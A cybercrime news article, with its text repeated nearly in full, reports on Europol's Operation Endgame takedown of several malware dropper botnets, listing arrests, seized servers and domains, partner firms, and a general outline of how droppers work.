Cyber Crime
Operation Endgame: Eight Most Wanted Cybercriminals Exposed – Find Out Who They Are!
In a massive operation conducted between May 27 and 29, 2024, Europol coordinated an extensive crackdown on some of the most notorious droppers, including IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot.
Known as Operation Endgame, this initiative aimed to dismantle criminal infrastructures, arrest high-value targets, and freeze illegal assets. The efforts spanned multiple countries, marking the largest-ever operation against botnets, which are integral to the deployment of ransomware.
Unprecedented Global Collaboration
Initiated and led by France, Germany, and the Netherlands, Operation Endgame saw cooperation from a diverse coalition of countries, including Denmark, the United Kingdom, the United States, Armenia, Bulgaria, Lithuania, Portugal, Romania, Switzerland, and Ukraine. Eurojust played a critical role by supporting the operation, which involved over 20 law enforcement officers from Denmark, France, Germany, and the United States coordinating actions from Europol’s command post.
ALSO READ: Is India Inc. Ready for the DPDP Act 2023? Join the Webinar by Future Crime Research Foundation
Key Achievements
The coordinated efforts led to significant outcomes:
- Arrests: Four individuals were arrested (one in Armenia and three in Ukraine).
- Searches: Sixteen locations were searched (one in Armenia, one in the Netherlands, three in Portugal, and eleven in Ukraine).
- Infrastructure Disruption: Over 100 servers were taken down or disrupted across Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the United Kingdom, the United States, and Ukraine.
- Domain Control: More than 2,000 domains were brought under the control of law enforcement.
Through the investigations, authorities discovered that one of the primary suspects had amassed at least EUR 69 million in cryptocurrency by renting out criminal infrastructure sites to deploy ransomware. Legal permissions have been secured to seize these assets in future actions.
The Role of Droppers in Cybercrime
Malware droppers are a crucial component in cyber-attacks, serving as the first stage of infection. These malicious programs are designed to bypass security measures and install additional harmful software onto target systems. Droppers themselves do not cause direct damage but facilitate the deployment of more destructive payloads, such as ransomware, viruses, and spyware.
Key droppers targeted in Operation Endgame included:
- SystemBC: Facilitated anonymous communication between infected systems and command-and-control servers.
- Bumblebee: Delivered and executed further payloads via phishing campaigns or compromised websites.
- SmokeLoader: Acted as a downloader for additional malicious software.
- IcedID (BokBot): Originally a banking trojan, it evolved to serve various cybercrimes beyond financial data theft.
- Pikabot: A trojan used to gain initial access to systems, enabling ransomware deployment and data theft.
Phases of Dropper Operations
Infiltration: Droppers enter systems through email attachments, compromised websites, or bundled with legitimate software.
Execution: They install additional malware onto the victim’s computer, often without the user’s knowledge.
Evasion: Designed to evade detection by security software through code obfuscation, memory-based execution, or impersonating legitimate processes.
Payload Delivery: After deploying the additional malware, droppers may remain inactive or remove themselves to evade detection, leaving the payload to execute malicious activities.
Ongoing Efforts and Future Actions
Operation Endgame is not the conclusion of efforts to combat botnets. New actions will be announced on the Operation Endgame website, providing information for suspects and witnesses to come forward. Europol will continue facilitating intelligence exchanges, crypto-tracing, and forensic support.
The operation also involved extensive support from private partners at both national and international levels, including Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus, and DIVD.
Command Post and Coordination
Europol’s command post coordinated the operational actions, with over 50 coordination calls and an operational sprint at its headquarters. A virtual command post ensured real-time coordination between officers in Armenia, France, Portugal, and Ukraine. Local command posts were established in Germany, the Netherlands, Portugal, the United States, and Ukraine. Eurojust supported the judicial cooperation through its coordination center.
Operation Endgame marks a najor victory in the global fight against cybercrime, demonstrating the power of international collaboration and coordinated action. The operation’s success underscores the importance of continued efforts to dismantle criminal networks and protect digital infrastructure worldwide.
In a massive operation conducted between May 27 and 29, 2024, Europol coordinated an extensive crackdown on some of the most notorious droppers, including IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot.
Known as Operation Endgame, this initiative aimed to dismantle criminal infrastructures, arrest high-value targets, and freeze illegal assets. The efforts spanned multiple countries, marking the largest-ever operation against botnets, which are integral to the deployment of ransomware.
Unprecedented Global Collaboration
Initiated and led by France, Germany, and the Netherlands, Operation Endgame saw cooperation from a diverse coalition of countries, including Denmark, the United Kingdom, the United States, Armenia, Bulgaria, Lithuania, Portugal, Romania, Switzerland, and Ukraine. Eurojust played a critical role by supporting the operation, which involved over 20 law enforcement officers from Denmark, France, Germany, and the United States coordinating actions from Europol’s command post.
ALSO READ: Ransomware Attack Compromises Data at Medical Device Manufacturer LivaNova: Complete Details Inside
Key Achievements
The coordinated efforts led to significant outcomes:
Arrests: Four individuals were arrested (one in Armenia and three in Ukraine).
Searches: Sixteen locations were searched (one in Armenia, one in the Netherlands, three in Portugal, and eleven in Ukraine).
Infrastructure Disruption: Over 100 servers were taken down or disrupted across Bulgaria, Canada, Germany, Lithuania, the Netherlands, Romania, Switzerland, the United Kingdom, the United States, and Ukraine.
Domain Control: More than 2,000 domains were brought under the control of law enforcement.
Through the investigations, authorities discovered that one of the primary suspects had amassed at least EUR 69 million in cryptocurrency by renting out criminal infrastructure sites to deploy ransomware. Legal permissions have been secured to seize these assets in future actions.
The Role of Droppers in Cybercrime
Malware droppers are a crucial component in cyber-attacks, serving as the first stage of infection. These malicious programs are designed to bypass security measures and install additional harmful software onto target systems. Droppers themselves do not cause direct damage but facilitate the deployment of more destructive payloads, such as ransomware, viruses, and spyware.
Key droppers targeted in Operation Endgame included:
SystemBC: Facilitated anonymous communication between infected systems and command-and-control servers.
Bumblebee: Delivered and executed further payloads via phishing campaigns or compromised websites.
SmokeLoader: Acted as a downloader for additional malicious software.
IcedID (BokBot): Originally a banking trojan, it evolved to serve various cybercrimes beyond financial data theft.
Pikabot: A trojan used to gain initial access to systems, enabling ransomware deployment and data theft.
Phases of Dropper Operations
Infiltration: Droppers enter systems through email attachments, compromised websites, or bundled with legitimate software.
Execution: They install additional malware onto the victim’s computer, often without the user’s knowledge.
Evasion: Designed to evade detection by security software through code obfuscation, memory-based execution, or impersonating legitimate processes.
Payload Delivery: After deploying the additional malware, droppers may remain inactive or remove themselves to evade detection, leaving the payload to execute malicious activities.
Ongoing Efforts and Future Actions
Operation Endgame is not the conclusion of efforts to combat botnets. New actions will be announced on the Operation Endgame website, providing information for suspects and witnesses to come forward. Europol will continue facilitating intelligence exchanges, crypto-tracing, and forensic support.
The operation also involved extensive support from private partners at both national and international levels, including Bitdefender, Cryptolaemus, Sekoia, Shadowserver, Team Cymru, Prodaft, Proofpoint, NFIR, Computest, Northwave, Fox-IT, HaveIBeenPwned, Spamhaus, and DIVD.
Command Post and Coordination
Europol’s command post coordinated the operational actions, with over 50 coordination calls and an operational sprint at its headquarters. A virtual command post ensured real-time coordination between officers in Armenia, France, Portugal, and Ukraine. Local command posts were established in Germany, the Netherlands, Portugal, the United States, and Ukraine. Eurojust supported the judicial cooperation through its coordination center.
Operation Endgame marks a najor victory in the global fight against cybercrime, demonstrating the power of international collaboration and coordinated action. The operation’s success underscores the importance of continued efforts to dismantle criminal networks and protect digital infrastructure worldwide.